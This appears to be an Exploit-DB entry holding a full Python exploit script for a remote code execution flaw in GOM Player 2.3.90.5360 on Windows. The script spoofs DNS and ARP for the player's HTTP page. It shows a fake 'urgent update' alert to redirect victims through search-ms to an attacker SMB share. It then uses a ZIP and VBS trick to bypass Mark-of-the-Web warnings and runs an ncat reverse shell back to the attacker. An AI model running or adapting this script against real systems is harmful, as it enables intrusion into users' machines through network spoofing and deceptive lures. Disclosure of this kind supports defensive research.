GOM Player 2.3.90.5360 - Remote Code Execution (RCE)

EDB-ID:

51719

CVE:

N/A




Platform:

Windows

Date:

2023-09-08


# Exploit Title: GOM Player 2.3.90.5360 - Remote Code Execution (RCE)
# Date: 26.08.2023
# Author: M. Akil Gündoğan
# Contact: https://twitter.com/akilgundogan
# Vendor Homepage: https://www.gomlab.com/gomplayer-media-player/
# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE
# Version: 2.3.90.5360 
# Tested on: Windows 10 Pro x64 22H2 19045.3324
# PoC Video: https://www.youtube.com/watch?v=8d0YUpdPzp8

# Impacts: GOM player has been downloaded 63,952,102 times according to CNET. It is used by millions of people worldwide.

# Vulnerability Description: 
# The IE component in the GOM Player's interface uses an insecure HTTP connection. Since IE is vulnerable to the 
# SMB/WebDAV+ "search-ms" technique, we can redirect the victim to the page we created with DNS spoofing and execute code on the target.
# In addition, the URL+ZIP+VBS MoTW bypass technique was used to prevent the victim from seeing any warning in the pop-up window. 

# Full disclosure, developers should be more careful about software security.

# Exploit Usage: Run it and enter the IP address of the target. Then specify the port to listen to for the reverse shell.

# Some spaghetti and a bad code but it works :)

banner = """\033[38;5;196m+-----------------------------------------------------------+
|     GOM Player 2.3.90.5360 - Remote Code Execution        |
|   Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-)  |
+-----------------------------------------------------------+\033[0m""" +""" 
\033[38;5;117m[*]- Author: M. Akil Gundogan - rootkit.com.tr\n\033[0m"""

import time,os,zipfile,subprocess,socket,sys

print(banner)

if os.geteuid() != 0:
    print("You need root privileges to run the exploit, please use sudo...")
    sys.exit(1)

targetIP = input("- Target IP address: ")
listenPort = input("- Listening port for Reverse Shell: ")

def fCreate(fileName,fileContent): # File create func. 
    f = open(fileName,"w")
    f.write(fileContent)
    f.close()    

gw = os.popen("ip -4 route show default").read().split()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((gw[2], 0))
ipaddr = s.getsockname()[0]
gateway = gw[2]
host = socket.gethostname()
print ("- My IP:", ipaddr, " Gateway:", gateway, " Host:", host) 

print("\n[*]- Stage 1: Downloading neccesary tools...")

smbFolderName = "GomUpdater" # change this (optional)
expWorkDir = "gomExploitDir" # change this (optional)
os.system("mkdir " + expWorkDir +" >/dev/null 2>&1 &") # Creating a working directory for the exploit.
time.sleep(1) # It's necessary for exploit stability. 
os.system("cd " + expWorkDir + "&& mkdir smb-shared web-shared >/dev/null 2>&1 &") # Creating a working directory for the exploit.
time.sleep(1) # It's necessary for exploit stability. 
os.system("cd " + expWorkDir + "/smb-shared && wget https://nmap.org/dist/ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && unzip -o -j ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && rm -rf ncat-portable-5.59BETA1.zip README") #Downloading ncat
print("    [*] - Ncat has been downloaded.")
subprocess.run("git clone https://github.com/fortra/impacket.git " + expWorkDir + "/impacket >/dev/null 2>&1",shell=True) # Downloading Impacket
print("    [*] - Impacket has been downloaded.")
subprocess.run("git clone https://github.com/dtrecherel/DNSSpoof.git " + expWorkDir + "/dnsspoof >/dev/null 2>&1",shell=True) # Downloading DNSSpoof.py
print("    [*] - DNSSpoof.py has been downloaded.")

print("[*]- Stage 2: Creating Attacker SMB Server...")
subprocess.Popen("cd gomExploitDir/impacket/examples && python3 smbserver.py "+smbFolderName+" ../../smb-shared -smb2support >/dev/null 2>&1",shell=True) # Running SMB server.
time.sleep(5) # It's necessary for exploit stability. 

smbIP = ipaddr
spoofUrl = "playinfo.gomlab.com" # Web page that causes vulnerability because it is used as HTTP

print("[*]- Stage 3: Creating Attacker Web Page...")

# change this (optional) 
screenExpPage = """
<meta charset="utf-8">
<script> window.alert("GOM Player için acil güncelleme yapılmalı ! Açılan pencerede lütfen updater'a tıklayın.");</script> 
<script>window.location.href= 'search-ms:displayname=GOM Player Updater&crumb=System.Generic.String%3AUpdater&crumb=location:%5C%5C"""+smbIP+"""';
</script>
"""

fCreate(expWorkDir + "/web-shared/screen.html",screenExpPage)
time.sleep(3) # It's necessary for exploit stability. 

print("[*]- Stage 4: Creating URL+VBS for MoTW bypass placing it into the ZIP archive...")
vbsCommand = '''Set shell=CreateObject("wscript.shell") 
Shell.Run("xcopy /y \\\\yogurt\\ayran\\ncat.exe %temp%")
WScript.Sleep 5000
Shell.Run("cmd /c start /min cmd /c %temp%\\ncat.exe attackerIP attackerPort -e cmd")''' # change this (optional)
vbsCommand = vbsCommand.replace("yogurt", smbIP).replace("ayran", smbFolderName).replace("attackerIP",smbIP).replace("attackerPort",listenPort)
fCreate(expWorkDir + "/payload.vbs",vbsCommand)

urlShortcut = '''[InternetShortcut]
URL=file://'''+smbIP+"/"+smbFolderName+'''/archive.zip/payload.vbs
IDlist='''
fCreate(expWorkDir + "/smb-shared/Updater.url",urlShortcut)
time.sleep(3) # It's necessary for exploit stability. 
zipName = expWorkDir + "/smb-shared/archive.zip"
payload_filename = os.path.join(expWorkDir, "payload.vbs")  

with zipfile.ZipFile(zipName, "w") as malzip:
    malzip.write(payload_filename, arcname=os.path.basename(payload_filename))

print("[*]- Stage 5: Running the attacker's web server...")
subprocess.Popen("cd " + expWorkDir + "/web-shared && python3 -m http.server 80 >/dev/null 2>&1",shell=True) # Running attacker web server with Python mini http.server
time.sleep(3) # It's necessary for exploit stability. 

print("[*]- Stage 6: Performing DNS and ARP spoofing for the target...")
subprocess.Popen("python3 " + expWorkDir + "/dnsspoof/dnsspoof.py -d " + spoofUrl + " -t " + targetIP + ">/dev/null 2>&1",shell=True) # DNS Spoofing...
time.sleep(10) # It's neccesary for exploit stability.
os.system("ping -c 5 " + targetIP + " >/dev/null 2>&1 &") # Ping the target... 
os.system("arping -c 5 " + targetIP + " >/dev/null 2>&1 &") # ARPing the target.
print("[*]- Stage 7: Waiting for the target to open GOM Player and execute the malicious URL shortcut...\n")
subprocess.run("nc -lvnp " + listenPort,shell=True)
subprocess.run("pkill -f smbserver.py & pkill -f http.server & pkill -f dnsspoof.py",shell=True) # Closing background processes after exploitation...